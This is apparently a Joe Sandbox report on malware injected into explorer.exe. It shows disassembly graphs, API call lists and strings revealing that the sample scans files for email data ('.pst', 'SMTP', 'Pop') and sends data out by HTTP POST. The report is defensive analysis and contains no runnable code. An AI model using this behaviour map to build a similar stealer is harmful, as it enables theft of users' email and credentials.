                                    • String ID: -$-$.$.$.pst$/$/$:$:$Blob$Pop$SMTP$_$_$from
                                    • API String ID: 1061763166-3069160855
                                    • Opcode ID: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                    • Instruction ID: 4b5aa8aed124a3871e58e12401931c93ac944f0da3ca0bc3fe3e93e69f00f3b1
                                    • Opcode Fuzzy Hash: b84919368493d7d5f368d1f8ce8e5c1d9a6d62c27fbc89321324b14f0ac629bc
                                    • Instruction Fuzzy Hash: BC5156B0B407165BEB64BA1888A46FE77DEBF85700F084919FDC44B283DB798C474792

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 350 81972-819a6 call 829b7 RtlMoveMemory 353 81c2c-81c31 350->353 354 819ac-819b6 350->354 355 819b7-819bb 354->355 356 819c1-819c3 355->356 357 81c17-81c25 355->357 356->357 358 819c9-819ce 356->358 357->355 359 81c2b 357->359 358->357 360 819d4-819db 358->360 359->353 360->357 361 819e1-819e4 360->361 361->357 362 819ea-819fc 361->362 363 819fe-81a05 362->363 364 81a4f-81a51 362->364 367 81a06-81a11 call 81ffb 363->367 365 81c10-81c12 364->365 366 81a57-81a68 364->366 369 81c13 365->369 366->365 368 81a6e-81a72 366->368 375 81a13-81a1e 367->375 376 81a37-81a3a 367->376 368->365 371 81a78-81a7c 368->371 369->357 373 81a7e-81a84 371->373 374 81ad1-81ad3 371->374 379 81a85-81a90 call 81ffb 373->379 374->365 378 81ad9-81adf 374->378 380 81a20-81a23 375->380 381 81a25-81a28 375->381 376->367 377 81a3c-81a4e 376->377 377->364 382 81b00-81b03 378->382 392 81abc-81abf 379->392 393 81a92-81a9d 379->393 380->376 380->381 381->376 384 81a2a-81a30 381->384 386 81ae1-81ae9 382->386 387 81b05-81b07 382->387 384->376 385 81a32-81a35 384->385 385->376 385->377 386->387 389 81aeb-81afa call 81ffb 386->389 390 81c0c 387->390 391 81b0d-81b14 387->391 389->382 389->390 390->365 391->390 396 81b1a-81b1d 391->396 392->379 394 81ac1-81acd 392->394 397 81a9f-81aa5 393->397 398 81aa7-81aad 393->398 394->374 396->390 400 81b23-81b2a 396->400 397->392 397->398 398->392 401 81aaf-81ab5 398->401 400->390 402 81b30-81b33 400->402 401->392 403 81ab7-81aba 401->403 402->390 404 81b39-81b73 call 829b7 RtlMoveMemory RtlZeroMemory 402->404 403->392 403->394 407 81b79-81b83 404->407 408 81c02-81c0a 404->408 407->408 409 81b85-81b8b 407->409 408->369 409->408 410 81b8d-81b9d StrStrIW 409->410 411 81bfb-81bfd call 82999 410->411 412 81b9f-81ba9 StrStrIW 410->412 411->408 412->411 414 81bab-81bb5 StrStrIW 412->414 414->411 415 81bb7-81bc1 StrStrIW 414->415 415->411 416 81bc3-81bcd StrStrIW 415->416 416->411 417 81bcf-81bd8 lstrlenW 416->417 417->411 418 81bda-81bf6 call 829b7 call 82917 call 81e44 call 82999 417->418 418->411
                                    APIs
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                    • RtlMoveMemory.NTDLL(00000000,00000000,00000001), ref: 00081B53
                                    • RtlZeroMemory.NTDLL(00000000,00000001), ref: 00081B61
                                    • StrStrIW.SHLWAPI(00000000,from), ref: 00081B99
                                    • StrStrIW.SHLWAPI(00000000,Blob), ref: 00081BA5
                                    • StrStrIW.SHLWAPI(00000000,Pop), ref: 00081BB1
                                    • StrStrIW.SHLWAPI(00000000,SMTP), ref: 00081BBD
                                    • StrStrIW.SHLWAPI(00000000,.pst), ref: 00081BC9
                                    • lstrlenW.KERNEL32(00000000), ref: 00081BD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapMove$AllocateProcessZerolstrlen
                                    • String ID: .pst$;$<$Blob$Pop$SMTP$from
                                    • API String ID: 76385412-3831209991
                                    • Opcode ID: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                    • Instruction ID: 4513c980414ea6726187ff74bc215935d9f5c7d3fe74b3bdc2598ba981a98ec9
                                    • Opcode Fuzzy Hash: daa115a76ccc5235f2113b9ee301909c6d2d8d6482403054c7f97d7641e7743b
                                    • Instruction Fuzzy Hash: 7B71D2357443129BDB28BF18DD40AEE77E9BF88750F148829E9C19B282DB70DD878791

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 426 820a7-82102 call 82415 call 829b7 call 82938 call 824cc 435 8211d-82129 426->435 436 82104-8211b 426->436 439 8212d-8212f 435->439 436->439 440 82403-82412 call 82999 439->440 441 82135-8216c RtlZeroMemory 439->441 445 823fb-82402 441->445 446 82172-8218d 441->446 445->440 447 821bf-821d1 446->447 448 8218f-821a0 call 8243d 446->448 453 821d5-821d7 447->453 454 821a2-821b1 448->454 455 821b3 448->455 456 823e8-823ee 453->456 457 821dd-82239 call 82866 453->457 458 821b5-821bd 454->458 455->458 461 823f0-823f2 call 82999 456->461 462 823f7 456->462 466 8223f-82244 457->466 467 823e1 457->467 458->453 461->462 462->445 468 8225e-8228c call 829b7 wsprintfW 466->468 469 82246-82257 466->469 467->456 472 8228e-82290 468->472 473 822a5-822bc 468->473 469->468 474 82291-82294 472->474 479 822fb-82315 473->479 480 822be-822f4 call 829b7 wsprintfW 473->480 475 8229f-822a1 474->475 476 82296-8229b 474->476 475->473 476->474 478 8229d 476->478 478->473 484 8231b-8232e 479->484 485 823be-823d4 call 82999 479->485 480->479 484->485 488 82334-8234a call 829b7 484->488 493 823dd 485->493 494 823d6-823d8 call 82999 485->494 495 8234c-82357 488->495 493->467 494->493 497 82359-82366 call 8297c 495->497 498 8236b-82382 495->498 497->498 502 82384 498->502 503 82386-82393 498->503 502->503 503->495 504 82395-82399 503->504 505 8239b 504->505 506 823b3-823ba call 82999 504->506 508 8239b call 8296b 505->508 506->485 510 823a0-823ad RtlMoveMemory 508->510 510->506
                                    APIs
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                      • Part of subcall function 00082938: lstrlen.KERNEL32(0061AE26,?,00000000,00000000,000820E3,75712B62,0061AE26,00000000), ref: 00082940
                                      • Part of subcall function 00082938: MultiByteToWideChar.KERNEL32(00000000,00000000,0061AE26,00000001,00000000,00000000), ref: 00082952
                                      • Part of subcall function 000824CC: RtlZeroMemory.NTDLL(?,00000018), ref: 000824DE
                                    • RtlZeroMemory.NTDLL(?,0000003C), ref: 0008213F
                                    • wsprintfW.USER32 ref: 00082278
                                    • wsprintfW.USER32 ref: 000822E3
                                    • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000823AD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                    • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                    • API String ID: 4204651544-1701262698
                                    • Opcode ID: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                    • Instruction ID: a01ef7159da9355fa114d69cd7f2b2a9dec58d7afaa36dde2eb3a980ae35fe43
                                    • Opcode Fuzzy Hash: 2d0a82c8d0d7e4589e8405ce0e55f6720ae0ccaaaabdf10beb67123a4c5655e5
                                    • Instruction Fuzzy Hash: 2DA16AB1608340AFE750EF68D894A6BBBE8FF88750F10092DF9C5D7252DA34DE058B52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 511 81ece-81eec StrStrIA 512 81eee-81ef0 511->512 513 81ef5-81f35 RtlMoveMemory * 2 StrStrIA 511->513 514 81fab-81fb3 512->514 515 81fa7 513->515 516 81f37-81f48 StrStrIA 513->516 517 81fa9-81faa 515->517 516->515 518 81f4a-81f5b StrStrIA 516->518 517->514 518->515 519 81f5d-81f68 lstrlen 518->519 520 81f6a 519->520 521 81fa3-81fa5 519->521 522 81f6c-81f78 call 81ffb 520->522 521->517 525 81f7a-81f80 522->525 526 81f9b-81fa1 lstrlen 522->526 527 81f82-81f85 525->527 528 81f87-81f8a 525->528 526->521 526->522 527->526 527->528 528->526 529 81f8c-81f8f 528->529 529->526 530 81f91-81f94 529->530 530->526 531 81f96-81f99 530->531 531->515 531->526
                                    APIs
                                    • StrStrIA.SHLWAPI(00000000,000831D8), ref: 00081EE4
                                    • RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 00081F08
                                    • RtlMoveMemory.NTDLL(?,?), ref: 00081F22
                                    • StrStrIA.SHLWAPI(00000000,?), ref: 00081F31
                                    • StrStrIA.SHLWAPI(00000000,?), ref: 00081F44
                                    • StrStrIA.SHLWAPI(?,?), ref: 00081F57
                                    • lstrlen.KERNEL32(00000000), ref: 00081F64
                                    • lstrlen.KERNEL32(00000000), ref: 00081F9D
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: MemoryMovelstrlen
                                    • String ID:
                                    • API String ID: 456560858-0
                                    • Opcode ID: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                    • Instruction ID: 6da4ad79282a5736bd751d79d8e3ad9208539ada28f005c9117f4ca21c0103b0
                                    • Opcode Fuzzy Hash: 7a14b61d49639bded18d49fe900f4b0fc9897078ed695063aad06e24d9f1e285
                                    • Instruction Fuzzy Hash: 702190725043196ADB30BA649C85FEB7BDCAF85744F000936EBC4C3113E729D94B87A2
                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,75A7D250,?,?,00081E22), ref: 00081E5D
                                    • CharLowerBuffA.USER32(00000000,00000000), ref: 00081E69
                                    • lstrcmpi.KERNEL32(00000000,0061C16C), ref: 00081E81
                                    • lstrlen.KERNEL32(00000000,?,00081E22), ref: 00082699
                                    • RtlMoveMemory.NTDLL(0061C16C,00000000,00000000), ref: 000826A2
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
                                    • String ID:
                                    • API String ID: 2826435453-0
                                    • Opcode ID: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                    • Instruction ID: 01f6e81a6ba3fb045b30a4bd0ba53f7463dec2894d89fef1a73f4158b8aeafa4
                                    • Opcode Fuzzy Hash: ef267b4f75cccad907b9530f99bc2299fdce0451e31b5f1636dbc808011e4daf
                                    • Instruction Fuzzy Hash: 3221C6B66002105FE710AF24EC849FA77DDFFC9725B10052AEC85C7251D776990687A2
                                    APIs
                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0008190C
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0008191C
                                    • CloseHandle.KERNEL32(00000000), ref: 00081966
                                      • Part of subcall function 000829B7: GetProcessHeap.KERNEL32(00000008,00000412,0008257A,000818F4), ref: 000829BA
                                      • Part of subcall function 000829B7: RtlAllocateHeap.NTDLL(00000000), ref: 000829C1
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00081941
                                      • Part of subcall function 00081C39: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081C55
                                      • Part of subcall function 00081972: RtlMoveMemory.NTDLL(00000000,-00000040,?), ref: 00081994
                                    Memory Dump Source
                                    • Source File: 00000015.00000002.512498650.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_21_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$HeapMemoryMove$AllocateCloseCreateHandleProcessReadSize
                                    • String ID:
                                    • API String ID: 3402831612-0
                                    • Opcode ID: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                    • Instruction ID: 92500d04bea994f5137bb789ba7b1fdb9588a09fa389c957eef6f3e76e100f7c
                                    • Opcode Fuzzy Hash: 2be5267b56057d24c1f5efdeeaf95091aebe7c739d2765d28efaa2af9e852935
                                    • Instruction Fuzzy Hash: EF01D6323002147BE2213A35DC68EEF7A9DFF86BB4F010629F5D6A21D1DA259D069770

                                    Execution Graph

                                    Execution Coverage:13.3%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:223
                                    Total number of Limit Nodes:16
                                    execution_graph 1577 82c18 1578 82c2a 1577->1578 1579 82bf2 11 API calls 1578->1579 1581 82c82 1578->1581 1580 82c45 1579->1580 1580->1581 1582 81141 2 API calls 1580->1582 1583 82c59 1582->1583 1584 82c79 1583->1584 1585 82c5d lstrlen 1583->1585 1588 8105d VirtualFree 1584->1588 1586 82678 6 API calls 1585->1586 1586->1584 1588->1581 1334 83449 RtlEnterCriticalSection 1335 8346e 1334->1335 1336 834ce 1334->1336 1335->1336 1337 835bc RtlLeaveCriticalSection 1335->1337 1367 81274 VirtualQuery 1335->1367 1336->1337 1338 81274 VirtualQuery 1336->1338 1339 834e9 1338->1339 1339->1337 1342 834fd RtlZeroMemory 1339->1342 1366 835b1 1339->1366 1408 82f3d 1342->1408 1344 81274 VirtualQuery 1346 83494 1344->1346 1346->1336 1348 83498 lstrcat 1346->1348 1347 83526 StrToIntA 1347->1337 1349 8353b 1347->1349 1369 82faa 1348->1369 1420 81141 lstrlen lstrlen 1349->1420 1356 83558 1359 83574 1356->1359 1422 8105d VirtualFree 1356->1422 1357 83595 1360 82faa 16 API calls 1357->1360 1423 8104c VirtualAlloc 1359->1423 1363 835aa 1360->1363 1365 82f1f 22 API calls 1363->1365 1364 83585 RtlMoveMemory 1364->1337 1365->1366 1366->1337 1368 8128b 1367->1368 1368->1336 1368->1344 1370 81141 2 API calls 1369->1370 1371 82fbf 1370->1371 1372 82fd1 1371->1372 1373 81141 2 API calls 1371->1373 1376 83129 1372->1376 1424 81000 GetProcessHeap RtlAllocateHeap 1372->1424 1373->1372 1375 82fe6 1425 81000 GetProcessHeap RtlAllocateHeap 1375->1425 1404 82f1f 1376->1404 1378 82ff1 RtlZeroMemory 1379 82f3d 3 API calls 1378->1379 1380 83013 1379->1380 1381 83118 1380->1381 1382 8301e StrToIntA 1380->1382 1384 81011 3 API calls 1381->1384 1382->1381 1383 83038 1382->1383 1385 82f3d 3 API calls 1383->1385 1386 83120 1384->1386 1387 83047 1385->1387 1388 81011 3 API calls 1386->1388 1387->1381 1389 83051 lstrlen 1387->1389 1388->1376 1390 82f3d 3 API calls 1389->1390 1391 83066 1390->1391 1392 81141 2 API calls 1391->1392 1393 83074 1392->1393 1393->1381 1426 81000 GetProcessHeap RtlAllocateHeap 1393->1426 1395 8308b 1396 82f3d 3 API calls 1395->1396 1397 830a4 wsprintfA 1396->1397 1427 81000 GetProcessHeap RtlAllocateHeap 1397->1427 1399 830cc 1400 82f3d 3 API calls 1399->1400 1401 830dd lstrcat 1400->1401 1428 81011 1401->1428 1403 830ee lstrcat lstrlen RtlMoveMemory 1403->1381 1405 82f3c 1404->1405 1406 82f23 CreateThread CloseHandle 1404->1406 1407 8105d VirtualFree 1405->1407 1406->1405 1433 82ed2 1406->1433 1407->1336 1409 82f4b 1408->1409 1410 82f61 1408->1410 1411 81141 2 API calls 1409->1411 1412 81141 2 API calls 1410->1412 1417 82f57 1411->1417 1413 82f66 1412->1413 1414 82fa4 1413->1414 1415 81141 2 API calls 1413->1415 1414->1337 1414->1347 1415->1417 1416 81141 2 API calls 1418 82f8e 1416->1418 1417->1414 1417->1416 1418->1414 1419 82f92 RtlMoveMemory 1418->1419 1419->1414 1421 81162 1420->1421 1421->1337 1421->1356 1421->1357 1422->1359 1423->1364 1424->1375 1425->1378 1426->1395 1427->1399 1429 81274 VirtualQuery 1428->1429 1430 81019 1429->1430 1431 8102d 1430->1431 1432 8101d GetProcessHeap HeapFree 1430->1432 1431->1403 1432->1431 1434 82edd 1433->1434 1435 82f16 RtlExitUserThread 1433->1435 1445 8178c lstrlen 1434->1445 1438 82f0e 1440 81011 3 API calls 1438->1440 1440->1435 1443 82f07 1444 81011 3 API calls 1443->1444 1444->1438 1446 817d3 1445->1446 1447 817a4 CryptBinaryToStringA 1445->1447 1446->1438 1451 81b1b 1446->1451 1447->1446 1448 817b7 1447->1448 1463 81000 GetProcessHeap RtlAllocateHeap 1448->1463 1450 817c2 CryptBinaryToStringA 1450->1446 1452 81b3e 1451->1452 1453 81b31 lstrlen 1451->1453 1464 81000 GetProcessHeap RtlAllocateHeap 1452->1464 1453->1452 1455 81b46 lstrcat 1456 81b7b lstrcat 1455->1456 1457 81b82 1455->1457 1456->1457 1465 8186c 1457->1465 1460 81011 3 API calls 1461 81ba5 1460->1461 1462 8105d VirtualFree 1461->1462 1462->1443 1463->1450 1464->1455 1488 81000 GetProcessHeap RtlAllocateHeap 1465->1488 1467 81890 1489 8106c lstrlen MultiByteToWideChar 1467->1489 1469 8189f 1490 817dc RtlZeroMemory 1469->1490 1472 818f1 RtlZeroMemory 1475 81926 1472->1475 1473 81011 3 API calls 1474 81b10 1473->1474 1474->1460 1476 81af3 1475->1476 1492 81000 GetProcessHeap RtlAllocateHeap 1475->1492 1476->1473 1478 819e2 wsprintfW 1479 81a02 1478->1479 1487 81add 1479->1487 1493 81000 GetProcessHeap RtlAllocateHeap 1479->1493 1480 81011 3 API calls 1480->1476 1482 81a70 1483 81ad6 1482->1483 1494 8104c VirtualAlloc 1482->1494 1485 81011 3 API calls 1483->1485 1485->1487 1486 81ac6 RtlMoveMemory 1486->1483 1487->1480 1488->1467 1489->1469 1491 817fe 1490->1491 1491->1472 1491->1476 1492->1478 1493->1482 1494->1486 1495 82c8a 1503 82bf2 1495->1503 1497 82c9b 1498 82ca1 lstrlen 1497->1498 1499 82cc6 1497->1499 1508 82678 1498->1508 1523 8224c 1503->1523 1507 82c09 1507->1497 1509 82721 1508->1509 1510 82691 1508->1510 1522 8105d VirtualFree 1509->1522 1510->1509 1511 81274 VirtualQuery 1510->1511 1512 826a7 1511->1512 1512->1509 1513 82753 1512->1513 1515 8279e 1512->1515 1517 826e9 1512->1517 1536 81000 GetProcessHeap RtlAllocateHeap 1513->1536 1518 827ad 1515->1518 1537 81000 GetProcessHeap RtlAllocateHeap 1515->1537 1516 82768 memcpy 1516->1509 1521 82700 memcpy 1517->1521 1520 827c7 memcpy 1518->1520 1520->1509 1521->1509 1522->1499 1534 81000 GetProcessHeap RtlAllocateHeap 1523->1534 1525 82254 1526 823e3 1525->1526 1535 8104c VirtualAlloc 1526->1535 1528 82633 1528->1507 1529 825b5 lstrcat lstrcat lstrcat lstrcat 1530 823fc 1529->1530 1530->1528 1530->1529 1531 81011 GetProcessHeap HeapFree VirtualQuery 1530->1531 1532 82346 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree VirtualQuery 1530->1532 1533 8231f GetProcessHeap RtlAllocateHeap memcpy 1530->1533 1531->1530 1532->1530 1533->1530 1534->1525 1535->1530 1536->1516 1537->1520 1538 82cce 1539 82cd7 1538->1539 1540 82d02 1539->1540 1541 82678 6 API calls 1539->1541 1541->1540 1542 83401 1543 8340a 1542->1543 1544 83442 1542->1544 1545 81274 VirtualQuery 1543->1545 1546 83412 1545->1546 1546->1544 1547 83416 RtlEnterCriticalSection 1546->1547 1552 83132 1547->1552 1550 82f1f 22 API calls 1551 8343a RtlLeaveCriticalSection 1550->1551 1551->1544 1553 8314d 1552->1553 1566 832e8 1552->1566 1553->1566 1573 81000 GetProcessHeap RtlAllocateHeap 1553->1573 1555 831cd 1574 81000 GetProcessHeap RtlAllocateHeap 1555->1574 1557 83212 1558 832d8 1557->1558 1559 8322c lstrlen 1557->1559 1560 81011 3 API calls 1558->1560 1559->1558 1561 8323d 1559->1561 1562 832df 1560->1562 1563 81141 2 API calls 1561->1563 1564 81011 3 API calls 1562->1564 1565 8324b 1563->1565 1564->1566 1565->1558 1575 81000 GetProcessHeap RtlAllocateHeap 1565->1575 1566->1550 1568 83260 1576 81000 GetProcessHeap RtlAllocateHeap 1568->1576 1570 8327f wsprintfA lstrcat 1571 81011 3 API calls 1570->1571 1572 832b8 lstrcat lstrlen RtlMoveMemory 1571->1572 1572->1558 1573->1555 1574->1557 1575->1568 1576->1570 1599 83371 1600 8337a 1599->1600 1601 833b2 1599->1601 1602 81274 VirtualQuery 1600->1602 1603 83382 1602->1603 1603->1601 1604 83386 RtlEnterCriticalSection 1603->1604 1605 83132 13 API calls 1604->1605 1606 833a3 1605->1606 1607 82f1f 22 API calls 1606->1607 1608 833aa RtlLeaveCriticalSection 1607->1608 1608->1601 1609 832f4 1610 83302 1609->1610 1611 8335f 1610->1611 1612 8332b RtlEnterCriticalSection 1610->1612 1613 83342 1612->1613 1614 8334e 1612->1614 1615 82faa 16 API calls 1613->1615 1616 83357 RtlLeaveCriticalSection 1614->1616 1617 83347 1615->1617 1616->1611 1618 82f1f 22 API calls 1617->1618 1618->1614

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_00081C08 25 Function_0008104C 0->25 58 Function_00081C82 0->58 72 Function_00081BAF 0->72 86 Function_00081BD2 0->86 1 Function_00083709 2 Function_00081000 1->2 11 Function_00081011 1->11 45 Function_00081363 1->45 78 Function_000815BE 1->78 3 Function_00083401 9 Function_00082F1F 3->9 18 Function_00083132 3->18 51 Function_00081274 3->51 4 Function_00088702 5 Function_00081305 6 Function_00082C18 30 Function_00081141 6->30 35 Function_0008105D 6->35 48 Function_00082678 6->48 99 Function_00082BF2 6->99 7 Function_00081B1B 7->2 7->11 40 Function_0008186C 7->40 8 Function_00082E1B 8->2 8->11 85 Function_00082ED2 9->85 10 Function_0008231F 10->2 11->51 12 Function_00089814 13 Function_00083829 13->1 74 Function_000836A1 13->74 87 Function_000835D4 13->87 14 Function_00081320 15 Function_00089321 16 Function_00082F3D 16->30 17 Function_0008133F 18->2 18->11 18->30 19 Function_00081235 20 Function_00085137 21 Function_00088A37 22 Function_00089337 23 Function_00083449 23->9 23->16 23->25 23->30 23->35 23->51 70 Function_00082FAA 23->70 24 Function_0008104A 26 Function_00081E4C 27 Function_0008224C 27->2 28 Function_00081F4E 29 Function_00083840 31 Function_00082643 32 Function_00089844 33 Function_00082346 33->2 33->11 66 Function_00082296 33->66 34 Function_00082659 36 Function_0008285F 36->30 37 Function_00089955 38 Function_0008966A 39 Function_0008106C 40->2 40->11 40->25 40->39 63 Function_00081090 40->63 84 Function_000817DC 40->84 41 Function_0008926D 42 Function_00082B6E 42->7 42->11 42->35 42->42 52 Function_00082974 42->52 54 Function_0008178C 42->54 96 Function_000827E7 42->96 43 Function_00081261 44 Function_00083862 44->0 44->2 44->5 44->11 44->13 44->14 44->19 44->30 44->43 44->51 56 Function_0008118D 44->56 60 Function_00082D9A 44->60 44->63 67 Function_00082EA8 44->67 69 Function_000812AA 44->69 82 Function_000816C7 44->82 94 Function_00081FE5 44->94 45->17 46 Function_00089763 47 Function_00081765 48->2 48->51 49 Function_00083371 49->9 49->18 49->51 50 Function_00088A71 52->2 52->11 52->25 52->30 52->35 52->36 52->47 71 Function_000828AD 52->71 53 Function_00082C8A 53->35 53->48 53->99 54->2 55 Function_00083D8D 55->2 55->44 55->51 55->55 91 Function_00083BE1 55->91 57 Function_00088B81 93 Function_00081CE5 58->93 59 Function_00085198 61 Function_0008929C 62 Function_00088A9F 64 Function_00088F93 65 Function_00082295 67->8 68 Function_000815A9 70->2 70->11 70->16 70->30 71->30 73 Function_000850A0 74->2 74->11 74->45 83 Function_000814D8 74->83 75 Function_000823A2 76 Function_00081CA5 76->93 77 Function_000833B9 77->9 77->18 77->51 78->2 78->11 78->68 78->78 79 Function_00082CCE 79->48 80 Function_000887CE 81 Function_00088CC3 83->2 83->11 89 Function_000813D7 83->89 98 Function_000813FE 83->98 85->7 85->11 85->35 85->54 86->76 87->2 87->11 87->45 87->83 88 Function_000893D4 90 Function_00088EEF 91->2 91->5 91->13 91->14 91->19 91->30 91->43 91->51 91->63 91->67 91->69 91->94 92 Function_000823E3 92->10 92->11 92->25 92->33 92->75 94->26 94->28 94->51 95 Function_000895E5 96->11 96->51 97 Function_000889F9 98->2 98->11 98->83 98->89 99->27 99->92 100 Function_000832F4 100->9 100->70

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 83862-838de call 81000 GetModuleFileNameA call 81000 GetCurrentProcessId wsprintfA call 8118d CreateMutexA GetLastError 7 838e4-83940 RtlInitializeCriticalSection PathFindFileNameA lstrcat call 81000 Sleep lstrcmpi 0->7 8 83bc5-83c3a call 81011 * 2 RtlExitUserThread call 81000 * 2 wsprintfA call 81235 0->8 14 83a0a-83a14 lstrcmpi 7->14 15 83946-83961 GetCommandLineW CommandLineToArgvW 7->15 69 83c3c-83c4c call 81141 8->69 70 83c5e 8->70 17 83a1a-83a24 lstrcmpi 14->17 18 83b14-83b39 call 816c7 GetModuleHandleA GetProcAddress 14->18 19 83bc3-83bc4 15->19 20 83967-8398b call 816c7 GetModuleHandleA GetProcAddress 15->20 17->18 24 83a2a-83a40 lstrcmpi 17->24 34 83b3b-83b47 call 81c08 18->34 35 83b4c-83b59 GetModuleHandleA GetProcAddress 18->35 19->8 32 8398d-83999 call 81c08 20->32 33 8399e-839c0 GetModuleHandleA GetProcAddress 20->33 28 83a42-83a4e GetCommandLineA StrStrIA 24->28 29 83a67-83a71 lstrcmpi 24->29 28->29 37 83a50 28->37 30 83a88-83a92 lstrcmpi 29->30 31 83a73-83a7f GetCommandLineA StrStrIA 29->31 30->19 39 83a98-83aa4 GetCommandLineA StrStrIA 30->39 31->30 38 83a81-83a86 31->38 32->33 41 839c2-839d0 GetModuleHandleA GetProcAddress 33->41 42 839d6-839e8 GetModuleHandleA GetProcAddress 33->42 34->35 44 83b5b-83b67 call 81c08 35->44 45 83b6c-83b79 GetModuleHandleA GetProcAddress 35->45 47 83a55-83a65 GetModuleHandleA 37->47 38->47 39->19 48 83aaa-83ac5 GetModuleHandleA 39->48 41->42 49 83b08-83b0f call 816c7 41->49 50 839f9-83a05 42->50 51 839ea-839f3 GetModuleHandleA GetProcAddress 42->51 44->45 54 83b7b-83b87 call 81c08 45->54 55 83b8c-83bbe call 816c7 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 45->55 56 83ace-83ad2 47->56 59 83ad8-83aea call 816c7 call 82d9a 48->59 60 83ac7-83acc GetModuleHandleA 48->60 49->19 61 83b03 call 81c08 50->61 51->49 51->50 54->55 55->19 56->19 56->59 59->49 82 83aec-83af5 call 81274 59->82 60->56 61->49 79 83c4e call 83829 69->79 80 83c53-83c59 call 81261 69->80 73 83c64-83c74 CreateToolhelp32Snapshot 70->73 76 83c7a-83c8e Process32First 73->76 77 83d7d-83d88 Sleep 73->77 81 83d6e-83d70 76->81 77->73 79->80 80->70 85 83c93-83ca5 lstrcmpi 81->85 86 83d76-83d77 CloseHandle 81->86 82->49 93 83af7-83b01 82->93 89 83cda-83ce3 call 812aa 85->89 90 83ca7-83cb5 lstrcmpi 85->90 86->77 97 83d62-83d68 Process32Next 89->97 98 83ce5-83cee call 81305 89->98 90->89 91 83cb7-83cc5 lstrcmpi 90->91 91->89 94 83cc7-83cd4 call 82ea8 91->94 93->61 94->89 94->97 97->81 98->97 102 83cf0-83cf7 call 81320 98->102 102->97 105 83cf9-83d06 call 81274 102->105 105->97 108 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 105->108 108->97
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00083886
                                    • GetCurrentProcessId.KERNEL32(00000001), ref: 0008389B
                                    • wsprintfA.USER32 ref: 000838B6
                                      • Part of subcall function 0008118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                      • Part of subcall function 0008118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                      • Part of subcall function 0008118D: lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                      • Part of subcall function 0008118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                      • Part of subcall function 0008118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                      • Part of subcall function 0008118D: wsprintfA.USER32 ref: 00081205
